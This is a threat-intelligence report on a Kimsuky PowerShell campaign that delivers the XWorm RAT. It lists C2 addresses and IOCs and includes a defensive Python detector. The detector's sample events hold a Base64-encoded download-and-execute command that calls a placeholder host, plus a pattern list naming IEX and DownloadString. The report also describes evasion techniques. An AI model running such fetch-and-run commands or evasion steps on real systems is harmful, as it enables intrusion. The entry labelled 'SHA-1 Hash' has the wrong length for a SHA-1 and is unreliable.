A recent technical analysis has revealed that the North Korean-linked Kimsuky APT group is actively leveraging PowerShell-based attack chains to deploy the XWorm Remote Access Trojan (RAT), among other payloads, as part of an ongoing intrusion campaign.
The attacks utilize advanced tactics, including Base64 encoding, staged payload deployment, fileless execution, and abuse of Windows native binaries (LOLBAS) to maximize stealth and evade traditional security controls.
Investigators identified two separate PowerShell payloads, both heavily obfuscated using Base64 encoding, which, upon decoding, orchestrate a multi-stage infection process.
These scripts are responsible for downloading additional components, including executables, archives, and disguised text files, primarily from the malicious IP address 185.235.128.114, an indicator of a central command-and-control (C2) hub for the operation.

PowerShell-Driven Attack Chain
The XWorm infection flow, as reverse-engineered from sandbox analysis and process trees, begins with the execution of obfuscated PowerShell scripts.
These scripts sequentially spawn multiple cmd.exe and powershell.exe instances, leveraging legitimate Windows binaries such as csc.exe, slui.exe, and sppextcomobj.exe to blend in with regular system activity, a hallmark of LOLBAS abuse.
Critical payloads are dropped into obscure directories, notably under C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\, using the .customDestinations-ms file extension, which is typical of Windows Jump List metadata but is repurposed by the attackers to hide malware artifacts.
These files either act as staging points or assist in evasion and persistence mechanisms.
Subsequent stages involve downloading and executing archives (e.g., enwtsv.rar) and binaries (eworvolt.exe, enwtsv.exe), often run multiple times to ensure execution reliability or to trigger various malware stages.
The scripts employ Invoke-Expression to dynamically execute decoded or downloaded PowerShell payloads, further complicating detection.
C2 Communications
Network telemetry confirms repeated communications with 185.235.128.114 for payload delivery, operational directives, and likely data exfiltration.
VirusTotal and threat intelligence platforms flag this address as associated with active malware distribution.
The PowerShell scripts also embed inline C# code using Add-Type to invoke the Windows API (ShowWindow from user32.dll), programmatically hiding PowerShell and Windows Terminal windows. This reduces the chance of discovery by users or automated defenses.
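As an added defensive example (not code from the report or from any analysis vendor), the following Python flags the behaviours described here and in the attack-chain section above: a Base64 -EncodedCommand that decodes to Invoke-Expression, Add-Type or ShowWindow usage, a script host spawning csc.exe or the other named LOLBAS binaries, and a script host writing a .customDestinations-ms file under CustomDestinations. The Sysmon-style events, the C2-PLACEHOLDER host and the file names are constructed for the example.

```python
import base64
import re
# Constructed Sysmon-style events modelled on the chain described above
# (illustrative records, not telemetry from the reported campaign).
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
ENCODED = base64.b64encode("IEX (New-Object Net.WebClient).DownloadString("
                           "'http://C2-PLACEHOLDER/p.txt')".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": PS,
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"EventID": 1, "ParentImage": PS, "CommandLine": "csc.exe /noconfig @C:\\tmp\\x.cmdline",
     "Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe"},
    {"EventID": 11, "Image": PS, "TargetFilename": "C:\\Users\\admin\\AppData\\Roaming\\Microsoft"
     "\\Windows\\Recent\\CustomDestinations\\1a2b.customDestinations-ms"},
    {"EventID": 1, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe"},
]
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
LOLBAS_CHILDREN = {"csc.exe", "slui.exe", "sppextcomobj.exe"}  # binaries named in the report
SUSPICIOUS = re.compile(
    r"\b(iex|invoke-expression|add-type|showwindow|downloadstring|frombase64string)\b", re.I)
basename = lambda path: path.rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload (Base64 of UTF-16LE text), or None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def evaluate(ev):
    """Return the detection reasons for one event (empty list = nothing fired)."""
    reasons, image = [], basename(ev["Image"])
    if ev["EventID"] == 1:
        cmd = ev.get("CommandLine", "")
        decoded = decode_encoded_command(cmd)
        reasons += ["encoded-command"] if decoded is not None else []
        reasons += ["token:" + t.lower() for t in SUSPICIOUS.findall(decoded or cmd)]
        parent = basename(ev["ParentImage"])
        # Add-Type compiles inline C# with csc.exe, so a script host spawning it stands out.
        if parent in SCRIPT_HOSTS and image in LOLBAS_CHILDREN:
            reasons.append(f"lolbas:{parent}->{image}")
    elif ev["EventID"] == 11:
        t = ev["TargetFilename"].lower()
        # Genuine Jump List files are written by the application itself, not by a script host.
        if "\\customdestinations\\" in t and t.endswith(".customdestinations-ms") and image in SCRIPT_HOSTS:
            reasons.append("jumplist-drop")
    return reasons

def triage(events):
    return {i: r for i, ev in enumerate(events) if (r := evaluate(ev))}
```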
Additionally, attackers occasionally drop benign-looking decoy files (such as PDFs) and open them with default viewers to distract users while the malware executes in the background.

Event log manipulation, registry queries, and system fingerprinting are performed to aid in defense evasion and target profiling.
Parallel analysis of another PowerShell script tied to Kimsuky reveals a similar staged approach: an initial EXE dropper (orwartde.exe) fetches additional PowerShell payloads (payload_1.ps1, ov4_dd_p.txt) disguised as benign text files.
The attack chain leverages password-protected archives and local extraction utilities (like UnRAR.exe) to unpack secondary payloads, with all command execution windows hidden for stealth.
This campaign's hallmarks are its persistence mechanisms, obfuscation, and reliance on live C2 infrastructure (notably 92.119.114.128 as an alternative endpoint).
The attackers employ defense evasion through disabling Windows event logging and encoding C2 communications.
The overall methodology demonstrates a highly modular, stealthy approach, using native OS tools and dynamic payload execution to evade endpoint and network defenses.
The multi-stage PowerShell scripts act as loaders, downloaders, and orchestrators for successive malware modules, including XWorm RAT, all while maintaining a low profile on compromised systems.
Indicators of Compromise (IOC)
Type | Value | Description |
---|---|---|
C2 IP Address | 185.235.128.114 | Main command-and-control server |
C2 IP Address | 92.119.114.128 | Alternate C2 endpoint |
SHA-1 Hash | e0564ad9157ced5ee57be9111a9e6c13eb7d4f7ecc8ce7724a55ae8428bbbc2 | Initial PowerShell script for XWorm stage |
File Name | orwartde.exe | Kimsuky dropper EXE |
File Name | ov4_dd_p.txt | PowerShell payload, disguised as text file |
File Name | payload_1.ps1 | Secondary stage PowerShell script |